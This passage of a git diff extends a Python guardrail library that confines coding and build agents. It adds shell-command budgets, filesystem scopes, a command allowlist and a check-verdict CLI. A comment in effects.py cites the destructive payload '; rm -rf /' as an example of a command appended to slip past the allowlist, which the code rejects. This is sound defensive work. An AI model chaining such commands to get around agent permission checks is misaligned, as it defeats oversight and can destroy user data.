- output = result - if hasattr(result, "data"): - output = result.data - if hasattr(result, "output"): - output = result.output - - errors = self._enforcer.validate_output( - output if isinstance(output, dict) else {"result": output} - ) - self._enforcer.evaluate_postconditions(output) - return errors - - async def run(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Run a Pydantic AI agent with contract enforcement. - - Wraps agent.run() with pre/post validation. - """ - # Validate input - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute agent - result = await agent.run(prompt, **kwargs) - - # Validate output - self.validate_result(result) - - return result - - def run_sync(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Synchronous version of run() for non-async contexts.""" - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - result = agent.run_sync(prompt, **kwargs) - self.validate_result(result) - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/src/agent_contracts/budgets.py b/src/agent_contracts/budgets.py index ae87c51..a63b44c 100644 --- a/src/agent_contracts/budgets.py +++ b/src/agent_contracts/budgets.py @@ -1,6 +1,6 @@ """Budget enforcement — per-invocation resource limits with circuit breaker. 
-Thread-safe counters for cost, tokens, tool calls, and elapsed time. +Thread-safe counters for cost, tokens, tool calls, shell commands, and elapsed time. """ from __future__ import annotations @@ -32,37 +32,28 @@ class BudgetSnapshot: cost_usd: float = 0.0 tokens: int = 0 tool_calls: int = 0 + shell_commands: int = 0 elapsed_seconds: float = 0.0 class BudgetTracker: - """Thread-safe budget tracker with circuit breaker. - - Tracks cost, tokens, tool calls, and elapsed time against configured limits. - Raises BudgetExceededError when a threshold is hit. - """ + """Thread-safe budget tracker with circuit breaker.""" def __init__( self, budgets: Optional[ResourceBudgets] = None, cost_callback: Optional[Callable[[], float]] = None, ) -> None: - """ - Args: - budgets: Resource limits to enforce. None = no enforcement. - cost_callback: Optional callable that returns current accumulated cost. - If not provided, cost must be reported via add_cost(). - """ self._budgets = budgets self._cost_callback = cost_callback self._lock = threading.Lock() self._cost_usd: float = 0.0 self._tokens: int = 0 self._tool_calls: int = 0 + self._shell_commands: int = 0 self._start_time: float = time.monotonic() def _safe_cost_callback(self) -> float: - """Call cost callback safely, falling back to internal counter on error.""" if self._cost_callback: try: return self._cost_callback() @@ -72,22 +63,20 @@ def _safe_cost_callback(self) -> float: @property def is_configured(self) -> bool: - """Whether any budget limits are configured.""" return self._budgets is not None def snapshot(self) -> BudgetSnapshot: - """Get a thread-safe snapshot of current consumption.""" with self._lock: cost = self._safe_cost_callback() return BudgetSnapshot( cost_usd=cost, tokens=self._tokens, tool_calls=self._tool_calls, + shell_commands=self._shell_commands, elapsed_seconds=time.monotonic() - self._start_time, ) def add_cost(self, amount: float) -> None: - """Record cost and check against limit.""" if amount < 0: 
raise ValueError("Cost amount must be non-negative.") with self._lock: @@ -95,7 +84,6 @@ def add_cost(self, amount: float) -> None: self._check_cost() def add_tokens(self, count: int) -> None: - """Record token usage and check against limit.""" if count < 0: raise ValueError("Token count must be non-negative.") with self._lock: @@ -103,21 +91,24 @@ def add_tokens(self, count: int) -> None: self._check_tokens() def record_tool_call(self) -> None: - """Record a tool call and check against limit.""" with self._lock: self._tool_calls += 1 self._check_tool_calls() + def record_shell_command(self) -> None: + with self._lock: + self._shell_commands += 1 + self._check_shell_commands() + def check_all(self) -> None: - """Check all budget limits. Raises BudgetExceededError on first violation.""" with self._lock: self._check_cost() self._check_tokens() self._check_tool_calls() + self._check_shell_commands() self._check_duration() def check_duration(self) -> None: - """Check elapsed time against limit.""" with self._lock: self._check_duration() @@ -143,6 +134,15 @@ def _check_tool_calls(self) -> None: float(self._budgets.max_tool_calls), ) + def _check_shell_commands(self) -> None: + if self._budgets and self._budgets.max_shell_commands is not None: + if self._shell_commands > self._budgets.max_shell_commands: + raise BudgetExceededError( + "shell_commands", + float(self._shell_commands), + float(self._budgets.max_shell_commands), + ) + def _check_duration(self) -> None: if self._budgets and self._budgets.max_duration_seconds is not None: elapsed = time.monotonic() - self._start_time @@ -152,9 +152,9 @@ def _check_duration(self) -> None: ) def reset(self) -> None: - """Reset all counters and restart the timer.""" with self._lock: self._cost_usd = 0.0 self._tokens = 0 self._tool_calls = 0 + self._shell_commands = 0 self._start_time = time.monotonic() diff --git a/src/agent_contracts/cli.py b/src/agent_contracts/cli.py index b0cb337..2580ed2 100644 --- 
a/src/agent_contracts/cli.py +++ b/src/agent_contracts/cli.py @@ -1,4 +1,4 @@ -"""CLI for Agent Contracts — validate, check-compat, init, test.""" +"""CLI for Agent Contracts — repo-local guardrails for coding/build agents.""" from __future__ import annotations @@ -11,12 +11,13 @@ import yaml from agent_contracts._version import __version__ +from agent_contracts.enforcer import load_verdict_artifact @click.group() @click.version_option(version=__version__, prog_name="aicontracts") def main() -> None: - """Agent Contracts — YAML spec + SDK for production agent reliability.""" + """Agent Contracts — repo-local fail-closed guardrails for coding/build agents.""" pass @@ -25,25 +26,25 @@ def main() -> None: @click.option("--json-output", "-j", is_flag=True, help="Output as JSON.") def validate(contract_path: str, json_output: bool) -> None: """Validate a contract YAML file against the spec.""" - from agent_contracts.loader import ( - ContractLoadError, - load_contract_yaml, - validate_contract, - ) + from agent_contracts.loader import ContractLoadError, load_contract_yaml, validate_contract from agent_contracts.tier import assess_tier, recommend_upgrades try: data = load_contract_yaml(contract_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) errors = validate_contract(data) tier = assess_tier(data) recommendations = recommend_upgrades(data, tier) - tier_names = {0: "Standalone", 1: "Enforceable", 2: "Composable"} + authorized = data.get("effects", {}).get("authorized", {}) + filesystem = authorized.get("filesystem", {}) if isinstance(authorized, dict) else {} + shell = authorized.get("shell", {}) if isinstance(authorized, dict) else {} + observability = data.get("observability", {}) + if json_output: result = { "valid": len(errors) == 0, @@ -51,33 +52,45 @@ def validate(contract_path: str, json_output: bool) -> None: "tier_name": tier_names.get(tier, 
"Unknown"), "errors": errors, "recommendations": [ - {"field": r.field, "target_tier": r.target_tier, "reason": r.reason} - for r in recommendations + { + "field": item.field, + "target_tier": item.target_tier, + "reason": item.reason, + } + for item in recommendations ], + "coding_surfaces": { + "filesystem_read": filesystem.get("read", []), + "filesystem_write": filesystem.get("write", []), + "shell_commands": shell.get("commands", []), + "run_artifact_path": observability.get("run_artifact_path"), + }, } click.echo(json.dumps(result, indent=2)) else: identity = data.get("identity", {}) - name = identity.get("name", "unknown") - version = identity.get("version", "?") - - click.echo(f"Contract: {name}@{version}") + click.echo(f"Contract: {identity.get('name', 'unknown')}@{identity.get('version', '?')}") click.echo(f"Spec version: {data.get('agent_contract', '?')}") - if errors: click.echo(f"\nValidation: FAILED ({len(errors)} error(s))") - for e in errors: - click.echo(f" - {e}") + for error in errors: + click.echo(f" - {error}") sys.exit(1) - else: - click.echo("\nValidation: PASSED") - + click.echo("\nValidation: PASSED") click.echo(f"Tier: {tier} ({tier_names.get(tier, 'Unknown')})") - + if filesystem or shell or observability.get("run_artifact_path"): + click.echo("\nCoding/build surfaces:") + if filesystem: + click.echo(f" read: {filesystem.get('read', [])}") + click.echo(f" write: {filesystem.get('write', [])}") + if shell: + click.echo(f" shell: {shell.get('commands', [])}") + if observability.get("run_artifact_path"): + click.echo(f" verdict artifact: {observability['run_artifact_path']}") if recommendations: click.echo(f"\nRecommendations to reach Tier {tier + 1}:") - for r in recommendations: - click.echo(f" + {r.field}: {r.reason}") + for item in recommendations: + click.echo(f" + {item.field}: {item.reason}") if errors: sys.exit(1) @@ -95,23 +108,30 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N try: producer = 
load_contract(producer_path) consumer = load_contract(consumer_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) report = check_compatibility(producer, consumer) - if json_output: result = { "compatible": report.compatible, "producer": report.producer, "consumer": report.consumer, - "schema_gaps": [{"field": g.field_path, "issue": g.issue} for g in report.schema_gaps], - "capability_gaps": [{"tool": g.tool, "reason": g.reason} for g in report.capability_gaps], + "schema_gaps": [ + {"field": gap.field_path, "issue": gap.issue} for gap in report.schema_gaps + ], + "capability_gaps": [ + {"tool": gap.tool, "reason": gap.reason} for gap in report.capability_gaps + ], "budget_gaps": [ - {"type": g.budget_type, "producer_limit": g.producer_limit, - "consumer_limit": g.consumer_limit, "issue": g.issue} - for g in report.budget_gaps + { + "type": gap.budget_type, + "producer_limit": gap.producer_limit, + "consumer_limit": gap.consumer_limit, + "issue": gap.issue, + } + for gap in report.budget_gaps ], "effect_violations": report.effect_violations, "warnings": report.warnings, @@ -119,44 +139,50 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N click.echo(json.dumps(result, indent=2)) else: click.echo(report.summary()) - if report.schema_gaps: click.echo("\nSchema gaps:") - for g in report.schema_gaps: - click.echo(f" - {g.field_path}: {g.issue}") - + for gap in report.schema_gaps: + click.echo(f" - {gap.field_path}: {gap.issue}") if report.capability_gaps: click.echo("\nCapability gaps:") - for g in report.capability_gaps: - click.echo(f" - {g.tool}: {g.reason}") - + for capability_gap in report.capability_gaps: + click.echo(f" - {capability_gap.tool}: {capability_gap.reason}") if report.budget_gaps: click.echo("\nBudget gaps:") - for g in report.budget_gaps: - click.echo(f" - {g.issue}") - + for budget_gap in 
report.budget_gaps: + click.echo(f" - {budget_gap.issue}") if report.effect_violations: click.echo("\nEffect violations:") - for v in report.effect_violations: - click.echo(f" - {v}") - + for violation in report.effect_violations: + click.echo(f" - {violation}") if report.warnings: click.echo("\nWarnings:") - for w in report.warnings: - click.echo(f" - {w}") + for warning in report.warnings: + click.echo(f" - {warning}") if not report.compatible: sys.exit(1) @main.command() -@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), - help="JSONL trace file to generate from.") +@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), help="JSONL trace file to generate from.") @click.option("--name", "-n", "agent_name", help="Agent name override.") @click.option("--version", "-v", "agent_version", help="Agent version override.") @click.option("--output", "-o", "output_path", type=click.Path(), help="Output file path.") -def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Optional[str], - output_path: Optional[str]) -> None: +@click.option( + "--template", + type=click.Choice(["basic", "coding"], case_sensitive=False), + default="basic", + show_default=True, + help="Template to use when not generating from traces.", +) +def init( + trace_path: Optional[str], + agent_name: Optional[str], + agent_version: Optional[str], + output_path: Optional[str], + template: str, +) -> None: """Generate a contract skeleton (optionally from execution traces).""" from agent_contracts.init_from_trace import generate_contract_yaml @@ -165,26 +191,69 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op trace_path, agent_name=agent_name, agent_version=agent_version ) else: - # Generate a minimal template - template = { - "agent_contract": "0.1.0", - "identity": { - "name": agent_name or "my-agent", - "version": agent_version or "0.1.0", - "description": "TODO: Describe what this agent 
does.", - }, - "contract": { - "postconditions": [ - { - "name": "produces_output", - "check": "output is not None", - "enforcement": "sync_block", - "severity": "critical", + if template == "coding": + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "repo-build-agent", + "version": agent_version or "0.1.0", + "description": "Repo-local coding/build agent with fail-closed scopes.", + }, + "effects": { + "authorized": { + "filesystem": { + "read": ["src/**", "tests/**", "README.md", "pyproject.toml"], + "write": ["src/**", "tests/**", "README.md"], + }, + "shell": { + "commands": [ + "python -m pytest *", + "python -m ruff check *", + ] + }, + "tools": [], + "network": [], + "state_writes": [], } - ] - }, - } - result = yaml.dump(template, sort_keys=False, default_flow_style=False) + }, + "resources": { + "budgets": { + "max_tokens": 50000, + "max_tool_calls": 20, + "max_shell_commands": 10, + "max_duration_seconds": 1800, + } + }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + } + ] + }, + } + else: + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "my-agent", + "version": agent_version or "0.1.0", + "description": "TODO: Describe what this agent does.", + }, + "contract": { + "postconditions": [ + { + "name": "produces_output", + "check": "output is not None", + } + ] + }, + } + result = yaml.dump(payload, sort_keys=False, default_flow_style=False) if output_path: Path(output_path).write_text(result, encoding="utf-8") @@ -193,10 +262,46 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op click.echo(result) +@main.command("check-verdict") +@click.argument("verdict_path", type=click.Path(exists=True)) +@click.option("--json-output", "-j", is_flag=True, help="Output as JSON.") 
+@click.option("--fail-on-warn", is_flag=True, help="Return non-zero for warn outcomes.") +def check_verdict(verdict_path: str, json_output: bool, fail_on_warn: bool) -> None: + """Inspect a verdict artifact and return a CI-friendly exit code.""" + verdict = load_verdict_artifact(verdict_path) + outcome = verdict.get("outcome", "unknown") + final_gate = verdict.get("final_gate", "unknown") + should_fail = outcome in {"blocked", "fail"} or (fail_on_warn and outcome == "warn") + + if json_output: + click.echo(json.dumps(verdict, indent=2)) + else: + click.echo(f"Outcome: {outcome}") + click.echo(f"Final gate: {final_gate}") + violations = verdict.get("violations", []) + checks = verdict.get("checks", []) + if violations: + click.echo("\nViolations:") + for violation in violations: + click.echo(f" - {violation.get('violated_clause')}") + if checks: + click.echo("\nChecks:") + for check in checks: + click.echo(f" - {check.get('name')}: {check.get('status')}") + + if should_fail: + sys.exit(1) + + @main.command() @click.argument("contract_path", type=click.Path(exists=True)) -@click.option("--eval-suite", "-e", "eval_dir", type=click.Path(exists=True), - help="Directory containing eval test cases (JSONL).") +@click.option( + "--eval-suite", + "-e", + "eval_dir", + type=click.Path(exists=True), + help="Directory containing eval test cases (JSONL).", +) def test(contract_path: str, eval_dir: Optional[str]) -> None: """Run eval suite against contract postconditions.""" from agent_contracts.loader import ContractLoadError, load_contract @@ -204,15 +309,17 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: try: contract = load_contract(contract_path) - except ContractLoadError as e: - click.echo(f"Error loading contract: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error loading contract: {exc}", err=True) sys.exit(1) if not eval_dir: click.echo(f"Contract '{contract.identity.name}' loaded (Tier {contract.tier}).") 
click.echo(f"Postconditions: {len(contract.postconditions)}") - for pc in contract.postconditions: - click.echo(f" - {pc.name} ({pc.enforcement}): {pc.check}") + for postcondition in contract.postconditions: + click.echo( + f" - {postcondition.name} ({postcondition.enforcement}): {postcondition.check}" + ) click.echo("\nNo eval suite specified. Use --eval-suite to run tests.") return @@ -226,10 +333,10 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: passed = 0 failed = 0 - for tf in test_files: - click.echo(f"\n--- {tf.name} ---") - with open(tf, encoding="utf-8") as f: - for line_num, line in enumerate(f, 1): + for test_file in test_files: + click.echo(f"\n--- {test_file.name} ---") + with open(test_file, encoding="utf-8") as handle: + for line_num, line in enumerate(handle, 1): line = line.strip() if not line: continue @@ -238,24 +345,24 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: except json.JSONDecodeError: click.echo(f" Line {line_num}: SKIP (invalid JSON)") continue - output = case.get("output", case.get("result")) total += 1 try: - results = evaluate_postconditions( - contract.postconditions, output - ) - all_passed = all(r.passed for r in results) - if all_passed: + results = evaluate_postconditions(contract.postconditions, output) + if all(result.passed for result in results): passed += 1 click.echo(f" Case {line_num}: PASS") else: failed += 1 - failed_names = [r.postcondition.name for r in results if not r.passed] + failed_names = [ + result.postcondition.name for result in results if not result.passed + ] click.echo(f" Case {line_num}: FAIL ({', '.join(failed_names)})") - except PostconditionError as e: + except PostconditionError as exc: failed += 1 - click.echo(f" Case {line_num}: FAIL (blocked: {e.postcondition.name})") + click.echo( + f" Case {line_num}: FAIL (blocked: {exc.postcondition.name})" + ) click.echo(f"\nResults: {passed}/{total} passed, {failed} failed") if failed > 0: diff --git 
a/src/agent_contracts/composition.py b/src/agent_contracts/composition.py index c04d3a5..4c2ba92 100644 --- a/src/agent_contracts/composition.py +++ b/src/agent_contracts/composition.py @@ -18,24 +18,18 @@ @dataclass class SchemaGap: - """A gap between producer output and consumer input schemas.""" - field_path: str issue: str @dataclass class CapabilityGap: - """A tool the consumer needs but the producer doesn't authorize for delegation.""" - tool: str reason: str @dataclass class BudgetGap: - """A budget field where the consumer exceeds what the producer allows.""" - budget_type: str producer_limit: Optional[float] consumer_limit: Optional[float] @@ -44,8 +38,6 @@ class BudgetGap: @dataclass class CompatibilityReport: - """Full compatibility report between two contracts.""" - compatible: bool producer: str consumer: str @@ -56,7 +48,6 @@ class CompatibilityReport: warnings: List[str] = field(default_factory=list) def summary(self) -> str: - """One-line summary of compatibility.""" if self.compatible: warnings = f" ({len(self.warnings)} warnings)" if self.warnings else "" return f"Compatible: {self.producer} -> {self.consumer}{warnings}" @@ -73,21 +64,18 @@ def _check_schema_compatibility( producer_output: Optional[Dict[str, Any]], consumer_input: Optional[Dict[str, Any]], ) -> List[SchemaGap]: - """Check if producer output schema is assignable to consumer input schema. - - This is a structural compatibility check, not full JSON Schema subtyping. - Checks that required consumer input fields exist in producer output. 
- """ gaps: List[SchemaGap] = [] if consumer_input is None: - return gaps # Consumer accepts anything + return gaps if producer_output is None: - gaps.append(SchemaGap( - field_path="(root)", - issue="Consumer expects structured input but producer has no output schema.", - )) + gaps.append( + SchemaGap( + field_path="(root)", + issue="Consumer expects structured input but producer has no output schema.", + ) + ) return gaps consumer_required = consumer_input.get("required", []) @@ -95,60 +83,69 @@ def _check_schema_compatibility( for req_field in consumer_required: if req_field not in producer_props: - gaps.append(SchemaGap( - field_path=req_field, - issue=f"Consumer requires field '{req_field}' but producer output schema doesn't define it.", - )) + gaps.append( + SchemaGap( + field_path=req_field, + issue=( + f"Consumer requires field '{req_field}' but producer output schema " + "doesn't define it." + ), + ) + ) - # Check type compatibility for shared fields consumer_props = consumer_input.get("properties", {}) for field_name, consumer_field in consumer_props.items(): if field_name in producer_props: producer_type = producer_props[field_name].get("type") consumer_type = consumer_field.get("type") if producer_type and consumer_type and producer_type != consumer_type: - gaps.append(SchemaGap( - field_path=field_name, - issue=f"Type mismatch: producer outputs '{producer_type}' but consumer expects '{consumer_type}'.", - )) + gaps.append( + SchemaGap( + field_path=field_name, + issue=( + f"Type mismatch: producer outputs '{producer_type}' " + f"but consumer expects '{consumer_type}'." 
+ ), + ) + ) return gaps -def _check_capability_compatibility( - producer: Contract, consumer: Contract -) -> List[CapabilityGap]: - """Check if the consumer's tool needs are covered by the producer's delegation.""" +def _check_capability_compatibility(producer: Contract, consumer: Contract) -> List[CapabilityGap]: gaps: List[CapabilityGap] = [] if consumer.effects_authorized is None: return gaps - # If producer has delegation rules, check allowed agents if producer.delegation and producer.delegation.allowed_agents is not None: if consumer.identity.name not in producer.delegation.allowed_agents: - gaps.append(CapabilityGap( - tool="(delegation)", - reason=f"Consumer '{consumer.identity.name}' not in producer's allowed_agents list.", - )) + gaps.append( + CapabilityGap( + tool="(delegation)", + reason=( + f"Consumer '{consumer.identity.name}' not in producer's " + "allowed_agents list." + ), + ) + ) - # If producer has authorized effects and attenuates during delegation, - # check that consumer's needed tools are within producer's scope if producer.effects_authorized and consumer.effects_authorized: for tool in consumer.effects_authorized.tools: if not matches_any(tool, producer.effects_authorized.tools): - gaps.append(CapabilityGap( - tool=tool, - reason=f"Consumer needs tool '{tool}' but producer doesn't authorize it.", - )) + gaps.append( + CapabilityGap( + tool=tool, + reason=( + f"Consumer needs tool '{tool}' but producer doesn't authorize it." 
+ ), + ) + ) return gaps -def _check_budget_compatibility( - producer: Contract, consumer: Contract -) -> List[BudgetGap]: - """Check if consumer budget fits within producer budget.""" +def _check_budget_compatibility(producer: Contract, consumer: Contract) -> List[BudgetGap]: gaps: List[BudgetGap] = [] if producer.budgets is None or consumer.budgets is None: @@ -158,41 +155,50 @@ def _check_budget_compatibility( ("max_cost_usd", producer.budgets.max_cost_usd, consumer.budgets.max_cost_usd), ("max_tokens", producer.budgets.max_tokens, consumer.budgets.max_tokens), ("max_tool_calls", producer.budgets.max_tool_calls, consumer.budgets.max_tool_calls), - ("max_duration_seconds", producer.budgets.max_duration_seconds, consumer.budgets.max_duration_seconds), + ( + "max_duration_seconds", + producer.budgets.max_duration_seconds, + consumer.budgets.max_duration_seconds, + ), + ( + "max_shell_commands", + producer.budgets.max_shell_commands, + consumer.budgets.max_shell_commands, + ), ] for budget_type, prod_limit, cons_limit in checks: if prod_limit is not None and cons_limit is not None: if cons_limit > prod_limit: - gaps.append(BudgetGap( + gaps.append( + BudgetGap( + budget_type=budget_type, + producer_limit=float(prod_limit), + consumer_limit=float(cons_limit), + issue=( + f"Consumer {budget_type}={cons_limit} exceeds producer " + f"limit={prod_limit}." 
+ ), + ) + ) + elif prod_limit is not None and cons_limit is None: + gaps.append( + BudgetGap( budget_type=budget_type, producer_limit=float(prod_limit), - consumer_limit=float(cons_limit), - issue=f"Consumer {budget_type}={cons_limit} exceeds producer limit={prod_limit}.", - )) - elif prod_limit is not None and cons_limit is None: - gaps.append(BudgetGap( - budget_type=budget_type, - producer_limit=float(prod_limit), - consumer_limit=None, - issue=f"Producer limits {budget_type}={prod_limit} but consumer has no limit.", - )) + consumer_limit=None, + issue=( + f"Producer limits {budget_type}={prod_limit} but consumer has no limit." + ), + ) + ) return gaps def check_compatibility(producer: Contract, consumer: Contract) -> CompatibilityReport: - """Compute the Contract Differential between a producer and consumer. - - Checks schema assignability, capability coverage, budget fit, - and effect authorization compliance. - """ - schema_gaps = _check_schema_compatibility( - producer.output_schema, consumer.input_schema - ) - + schema_gaps = _check_schema_compatibility(producer.output_schema, consumer.input_schema) capability_gaps = _check_capability_compatibility(producer, consumer) - budget_gaps = _check_budget_compatibility(producer, consumer) effect_violations: List[str] = [] @@ -203,9 +209,13 @@ def check_compatibility(producer: Contract, consumer: Contract) -> Compatibility warnings: List[str] = [] if producer.tier < 2: - warnings.append(f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition." + ) if consumer.tier < 2: - warnings.append(f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition." 
+ ) compatible = ( len(schema_gaps) == 0 diff --git a/src/agent_contracts/effects.py b/src/agent_contracts/effects.py index 557561d..57dfb03 100644 --- a/src/agent_contracts/effects.py +++ b/src/agent_contracts/effects.py @@ -1,4 +1,4 @@ -"""Effect authorization — default-deny tool gating with glob pattern matching. +"""Effect authorization for coding/build agents. Authorized effects compose via intersection during delegation. Declared effects compose via union for auditing. @@ -8,64 +8,170 @@ from __future__ import annotations import fnmatch -from typing import List, Optional, Set - -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from pathlib import Path +from typing import List, Optional, Sequence, Set + +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) + +# Shell metacharacters that enable command chaining, redirection, or +# substitution. Any command containing one of these is rejected outright +# in v0.2.x, regardless of pattern match. The fail-closed contract has +# no safe way to express "this prefix is allowed but only without an +# appended `; rm -rf /`" using fnmatch globs, because `*` would consume +# the operator and the payload as ordinary characters. +# +# v0.3.x will introduce a shlex-based token matcher that can express +# richer command shapes safely; until then, strict reject is the only +# correct fail-closed behavior. 
+_SHELL_METACHARS = frozenset(";&|<>`\n") +_SHELL_METASEQUENCES = ("$(",) + + +def _shell_metachar_in(command: str) -> Optional[str]: + """Return the first shell metacharacter found, or None.""" + for ch in command: + if ch in _SHELL_METACHARS: + return ch + for seq in _SHELL_METASEQUENCES: + if seq in command: + return seq + return None class EffectDeniedError(Exception): """Raised when a tool call or effect is not authorized.""" - def __init__(self, effect_type: str, name: str, allowed: List[str]) -> None: + def __init__(self, effect_type: str, name: str, allowed: Sequence[str]) -> None: self.effect_type = effect_type self.name = name - self.allowed = allowed + self.allowed = list(allowed) super().__init__( f"{effect_type} '{name}' denied. " - f"Authorized: {allowed if allowed else '(none — default deny)'}" + f"Authorized: {list(allowed) if allowed else '(none — default deny)'}" + ) + + +class ShellMetacharacterError(EffectDeniedError): + """Raised when a shell command contains a chaining/redirection/ + substitution metacharacter. Distinct from a plain authorization + failure so callers and verdict artifacts can distinguish 'matched + no allowlist entry' from 'attempted to chain commands'.""" + + def __init__(self, command: str, metachar: str, allowed: Sequence[str]) -> None: + self.metachar = metachar + self.command = command + super().__init__( + "shell.command", + command, + allowed, + ) + # Override the message to surface the bypass attempt explicitly. + self.args = ( + f"shell.command '{command}' rejected: contains shell metacharacter " + f"'{metachar}'. Command chaining, redirection, and substitution are " + f"not permitted under v0.2.x effect authorization. 
" + f"Authorized patterns: {list(allowed) if allowed else '(none)'}", ) -def matches_any(name: str, patterns: List[str]) -> bool: +def matches_any(name: str, patterns: Sequence[str]) -> bool: """Check if a name matches any of the given glob patterns.""" return any(fnmatch.fnmatch(name, pattern) for pattern in patterns) -class EffectGuard: - """Enforces the effects.authorized allowlist (default-deny). +def _intersect_lists(parent_list: Sequence[str], child_list: Sequence[str]) -> List[str]: + result: List[str] = [] + for child_pattern in child_list: + if matches_any(child_pattern, parent_list) or any( + fnmatch.fnmatch(parent_pattern, child_pattern) for parent_pattern in parent_list + ): + result.append(child_pattern) + return result - All checks are O(n) where n = number of patterns. For production - workloads with large allowlists, consider pre-compiling patterns. - """ - def __init__(self, authorized: Optional[EffectsAuthorized] = None) -> None: +class EffectGuard: + """Enforces the effects.authorized allowlist (default-deny when configured).""" + + def __init__( + self, + authorized: Optional[EffectsAuthorized] = None, + *, + repo_root: Optional[Path] = None, + ) -> None: self._authorized = authorized + self._repo_root = repo_root.resolve() if repo_root is not None else Path.cwd().resolve() @property def is_configured(self) -> bool: - """Whether effect authorization is configured.""" + """Whether effect authorization was configured on the contract.""" return self._authorized is not None + def _path_candidates(self, path: str) -> List[str]: + raw = Path(path) + absolute = raw if raw.is_absolute() else (self._repo_root / raw) + absolute = absolute.resolve() + candidates: List[str] = [path, absolute.as_posix()] + try: + candidates.append(absolute.relative_to(self._repo_root).as_posix()) + except ValueError: + pass + return list(dict.fromkeys(candidates)) + + def _filesystem_matches(self, path: str, patterns: Sequence[str]) -> bool: + return 
any(matches_any(candidate, patterns) for candidate in self._path_candidates(path)) + + def _normalized_command(self, command: str) -> str: + return " ".join(command.strip().split()) + def check_tool(self, tool_name: str) -> bool: - """Check if a tool call is authorized. Returns True if allowed.""" if self._authorized is None: - return True # No authorization configured = allow all + return True return matches_any(tool_name, self._authorized.tools) def check_network(self, url: str) -> bool: - """Check if a network request is authorized.""" if self._authorized is None: return True return matches_any(url, self._authorized.network) def check_state_write(self, scope: str) -> bool: - """Check if a state write is authorized.""" if self._authorized is None: return True return matches_any(scope, self._authorized.state_writes) + def check_file_read(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.read) + + def check_file_write(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.write) + + def check_shell_command(self, command: str) -> bool: + if self._authorized is None or self._authorized.shell is None: + return True + # Strict reject: any chaining/redirection/substitution metachar + # bypasses fnmatch's `*` and would let an attacker append payloads + # after an allowlisted prefix. Scan the RAW command (not the + # whitespace-normalized form) so newlines are not lost. + if _shell_metachar_in(command) is not None: + return False + normalized = self._normalized_command(command) + return matches_any(normalized, self._authorized.shell.commands) + + def shell_command_metachar(self, command: str) -> Optional[str]: + """Return the first shell metacharacter in the command, or None. 
+ Exposed so callers can distinguish 'unauthorized' from 'rejected + as a chaining attempt' when constructing verdicts.""" + return _shell_metachar_in(command) + def require_tool(self, tool_name: str) -> None: - """Assert a tool call is authorized; raise EffectDeniedError if not.""" if not self.check_tool(tool_name): raise EffectDeniedError( "tool", @@ -74,7 +180,6 @@ def require_tool(self, tool_name: str) -> None: ) def require_network(self, url: str) -> None: - """Assert a network request is authorized.""" if not self.check_network(url): raise EffectDeniedError( "network", @@ -83,7 +188,6 @@ def require_network(self, url: str) -> None: ) def require_state_write(self, scope: str) -> None: - """Assert a state write is authorized.""" if not self.check_state_write(scope): raise EffectDeniedError( "state_write", @@ -91,30 +195,56 @@ def require_state_write(self, scope: str) -> None: self._authorized.state_writes if self._authorized else [], ) + def require_file_read(self, path: str) -> None: + if not self.check_file_read(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.read + raise EffectDeniedError("filesystem.read", path, allowed) + + def require_file_write(self, path: str) -> None: + if not self.check_file_write(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.write + raise EffectDeniedError("filesystem.write", path, allowed) + + def require_shell_command(self, command: str) -> None: + if not self.check_shell_command(command): + allowed: List[str] = [] + if self._authorized is not None and self._authorized.shell is not None: + allowed = list(self._authorized.shell.commands) + metachar = _shell_metachar_in(command) + normalized = self._normalized_command(command) + if metachar is not None: + raise ShellMetacharacterError(normalized, metachar, allowed) + raise 
